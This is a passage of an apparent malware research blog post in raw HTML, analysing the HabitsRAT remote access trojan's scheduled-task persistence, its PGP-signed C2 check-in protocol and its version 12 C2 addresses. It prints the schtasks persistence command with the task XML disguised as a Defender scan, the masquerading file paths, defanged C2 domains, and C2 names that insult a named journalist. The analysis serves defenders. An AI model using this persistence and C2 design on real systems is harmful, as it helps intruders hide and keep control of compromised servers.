WantedBy=multi-user.target&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The Windows version of HabitsRAT uses scheduled tasks for persistence. First,
it writes the scheduled task &amp;ldquo;xml&amp;rdquo; to a file located at
&lt;code&gt;%TEMP%\krebsonsecurity.xml&lt;/code&gt;. The content of the file is shown in the snippet
below. The task is added by executing the shell command:
&lt;code&gt;sCHtAsks.exe /create /xml %TEMP%\krebsonsecurity.xml /tn WindowsDefenderScan&lt;/code&gt;&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-xml" data-lang="xml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-16&amp;#34;?&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;&amp;lt;Task&lt;/span&gt; &lt;span class="na"&gt;version=&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;1.2&amp;#34;&lt;/span&gt; &lt;span class="na"&gt;xmlns=&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;http://schemas.microsoft.com/windows/2004/02/mit/task&amp;#34;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;RegistrationInfo&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Date&amp;gt;&lt;/span&gt;2020-12-18T09:56:46.3915265&lt;span class="nt"&gt;&amp;lt;/Date&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Author&amp;gt;&lt;/span&gt;Microsoft Corporation&lt;span class="nt"&gt;&amp;lt;/Author&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;URI&amp;gt;&lt;/span&gt;\Microsoft\MicrosoftUpdater&lt;span class="nt"&gt;&amp;lt;/URI&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/RegistrationInfo&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Triggers&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;BootTrigger&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Enabled&amp;gt;&lt;/span&gt;true&lt;span class="nt"&gt;&amp;lt;/Enabled&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Delay&amp;gt;&lt;/span&gt;PT1M&lt;span class="nt"&gt;&amp;lt;/Delay&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/BootTrigger&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/Triggers&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Principals&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Principal&lt;/span&gt; &lt;span class="na"&gt;id=&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;Author&amp;#34;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;UserId&amp;gt;&lt;/span&gt;S-1-5-18&lt;span class="nt"&gt;&amp;lt;/UserId&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;RunLevel&amp;gt;&lt;/span&gt;HighestAvailable&lt;span class="nt"&gt;&amp;lt;/RunLevel&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/Principal&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/Principals&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Settings&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;MultipleInstancesPolicy&amp;gt;&lt;/span&gt;IgnoreNew&lt;span class="nt"&gt;&amp;lt;/MultipleInstancesPolicy&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;DisallowStartIfOnBatteries&amp;gt;&lt;/span&gt;false&lt;span class="nt"&gt;&amp;lt;/DisallowStartIfOnBatteries&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;StopIfGoingOnBatteries&amp;gt;&lt;/span&gt;false&lt;span class="nt"&gt;&amp;lt;/StopIfGoingOnBatteries&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;AllowHardTerminate&amp;gt;&lt;/span&gt;false&lt;span class="nt"&gt;&amp;lt;/AllowHardTerminate&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;StartWhenAvailable&amp;gt;&lt;/span&gt;true&lt;span class="nt"&gt;&amp;lt;/StartWhenAvailable&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;RunOnlyIfNetworkAvailable&amp;gt;&lt;/span&gt;false&lt;span class="nt"&gt;&amp;lt;/RunOnlyIfNetworkAvailable&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;IdleSettings&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;StopOnIdleEnd&amp;gt;&lt;/span&gt;true&lt;span class="nt"&gt;&amp;lt;/StopOnIdleEnd&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;RestartOnIdle&amp;gt;&lt;/span&gt;false&lt;span class="nt"&gt;&amp;lt;/RestartOnIdle&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/IdleSettings&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;AllowStartOnDemand&amp;gt;&lt;/span&gt;true&lt;span class="nt"&gt;&amp;lt;/AllowStartOnDemand&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Enabled&amp;gt;&lt;/span&gt;true&lt;span class="nt"&gt;&amp;lt;/Enabled&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Hidden&amp;gt;&lt;/span&gt;false&lt;span class="nt"&gt;&amp;lt;/Hidden&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;RunOnlyIfIdle&amp;gt;&lt;/span&gt;false&lt;span class="nt"&gt;&amp;lt;/RunOnlyIfIdle&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;WakeToRun&amp;gt;&lt;/span&gt;false&lt;span class="nt"&gt;&amp;lt;/WakeToRun&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;ExecutionTimeLimit&amp;gt;&lt;/span&gt;PT0S&lt;span class="nt"&gt;&amp;lt;/ExecutionTimeLimit&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Priority&amp;gt;&lt;/span&gt;7&lt;span class="nt"&gt;&amp;lt;/Priority&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/Settings&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Actions&lt;/span&gt; &lt;span class="na"&gt;Context=&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;Author&amp;#34;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Exec&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;Command&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; pathtobinary
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/Command&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/Exec&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/Actions&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;&amp;lt;/Task&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Command and Control Communication&lt;span class="hx:absolute hx:-mt-20" id="command-and-control-communication"&gt;&lt;/span&gt;
&lt;a href="#command-and-control-communication" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The RAT uses public-key cryptography to both encrypt and authenticate the
commands from the C2 server. The malware generates a public-private key pair
using an open-source library provided by Proton Mail. Figure 2 shows the call
to the
&lt;a href="https://pkg.go.dev/github.com/ProtonMail/gopenpgp/v2@v2.1.7/helper#GenerateKey"target="_blank" rel="noopener"&gt;GenerateKey&lt;/a&gt;
function and its arguments. The malware uses the machine&amp;rsquo;s hostname as the name
and an email address of &amp;ldquo;&lt;a href="mailto:a@a.a"&gt;a@a.a&lt;/a&gt;&amp;rdquo;. No password is provided and it&amp;rsquo;s requesting a
2048-bit RSA key to be used.&lt;/p&gt;
&lt;p&gt;The key is stored and written to disk. The Linux version of HabitsRAT writes to
&lt;code&gt;$HOME/.config/.accounts-daemon/accounts-daemon.login.conf&lt;/code&gt; if it is running as
a normal user or to &lt;code&gt;/usr/share/accounts-daemon/accounts-daemon.so&lt;/code&gt;. The
Windows version uses &lt;code&gt;%SystemDrive%WindowsDefenderMsMpEng.dll&lt;/code&gt; or
&lt;code&gt;%APPDATA%Windows NTDefenderMsMpEng.dll&lt;/code&gt; instead.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/04/habitsrat-used-to-target-linux-and-windows-servers/images/fig2.png" title="Figure 2: Generation of public-private key pair using the open-source library from Proton Mail." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 2: Generation of public-private key pair using the open-source library from Proton Mail.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;HabitsRAT sends a &amp;ldquo;check-in&amp;rdquo; POST request to the C2 server to see if it should
execute a command. As part of the request, it sends some data about the
infected machine. The form data of the request is shown below. The data
includes the &lt;code&gt;no_replay&lt;/code&gt; field that holds the sha256 hash of some random data.
This acts like a nonce to prevent executing the same request multiple times.
The request also includes the public key for the malware instance. This is to
allow the C2 server to encrypt the commands to it. It also has a version value
that is hardcoded to 11.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;no_replay: [sha256 hash of random data]
public_key: public key in ascii armour
hostname: [machine hostname]
goos: [linux or window]
goarch: amd64
shell: [$SHELL expanded]
root: [true or false]
version: 11&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The data is sent to &lt;code&gt;https://brian.krebsonsecurity[.]top/checkin&lt;/code&gt;. If no
command is returned, the malware sleeps for 10 seconds and sends the request
again. If the C2 responds with data, the malware checks that the threat actor&amp;rsquo;s
key has signed it. A hardcoded public key is included in the binary. Extracted
information from the key shows that it was generated in December 2020 and
includes a name and a Gmail address.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;pub rsa3072 2020-12-03 [SC] [expires: 2022-12-03]
uid [REDACTED] &amp;lt;[REDACTED]@gmail.com&amp;gt;
sub rsa3072 2020-12-03 [E] [expires: 2022-12-03]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;If the correct key has signed the response, HabitsRAT uses its private key to
decrypt the payload. The data has been serialized to JSON and the malware
unmarshals it to the data structure shown below.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-go" data-lang="go"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kd"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;main&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;CommandList&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;struct&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;No_replay&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Commands&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The Commands field is passed as arguments to either &lt;code&gt;bash -c&lt;/code&gt; for the Linux
version or &lt;code&gt;cmd /c&lt;/code&gt; for the Windows version.&lt;/p&gt;
&lt;h3&gt;HabitsRAT Version 12&lt;span class="hx:absolute hx:-mt-20" id="habitsrat-version-12"&gt;&lt;/span&gt;
&lt;a href="#habitsrat-version-12" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;A newer Windows version of HabitsRAT has also been found. Much of the
functionality is the same as version 11. The main difference is that it&amp;rsquo;s using
a different C2 public key and supports multiple C2 addresses. As can be seen
from the snippet below, this key was generated on the 2nd of April.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;pub rsa3072 2021-04-02 [SC] [expires: 2023-04-02]
uid Brian Krebs &amp;lt;krebsonsecurity@gmail.com&amp;gt;
sub rsa3072 2021-04-02 [E] [expires: 2023-04-02]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The malware uses four different C2 addresses and picks one out of random. The
addresses are as follows, which includes a domain of Brian Krebs&amp;rsquo;s leaked
social security number:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;https://brian-krebs-erectile-dysfunction[.]com
https://krebsonfellatio[.]net
http://XXX-XX-XXXX.com (Redacted)
hxxp://185.193.126.198&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The addresses are stored at:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;%SystemDrive%\Windows\Defender\Defender.dll
%APPDATA%\Windows NT\Defender\Defender.dll&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The HabitsRAT is a multi-operating system malware targeting both Windows and
Linux environments. There is a lot of code reuse between the two variants. It
provides the attacker with the capability to execute arbitrary code on the
infected machine. To protect its C2 communication, the data is encrypted and
signed using PGP. Ensure internet facing servers are patched to prevent being
infected by HabitsRAT. Indicators of Compromise (IoCs) below can be used to
detect if a server has been compromised. Go malware has been hard to detect by
Antivirus products so it&amp;rsquo;s likely this trend will continue. We have seen threat
actors pivot and target different operating systems with the same codebase for
the malware, resulting in low or undetected malware samples, especially for
Linux—which has a large presence in the cloud. Since the malware is derived
from the same codebase, detection based on
&lt;a href="https://analyze.intezer.com/files/338e41f1a8be56339b039835b06d815a3666c8b0d5725b63be7bf54c8745704a"target="_blank" rel="noopener"&gt;code reuse&lt;/a&gt;
has proven to be very effective.&lt;/p&gt;
&lt;p&gt;Runtime protection with &lt;a href="https://intezer.com/forensic-ai-soc/"target="_blank" rel="noopener"&gt;Intezer Protect&lt;/a&gt;
gives you immediate visibility over all code running in your systems and alerts
you whenever unauthorized or malicious code is executed. Intezer Protect users
can detect and mitigate threats like HabitsRAT on their Linux systems. Protect
10 hosts &lt;a href="https://protect.intezer.com/signup"target="_blank" rel="noopener"&gt;for free&lt;/a&gt; with our community
edition.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/04/habitsrat-used-to-target-linux-and-windows-servers/images/fig3.gif" title="Figure 3: HabitsRAT detection in Intezer Protect." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 3: HabitsRAT detection in Intezer Protect.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;IoCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Hashes&lt;span class="hx:absolute hx:-mt-20" id="hashes"&gt;&lt;/span&gt;
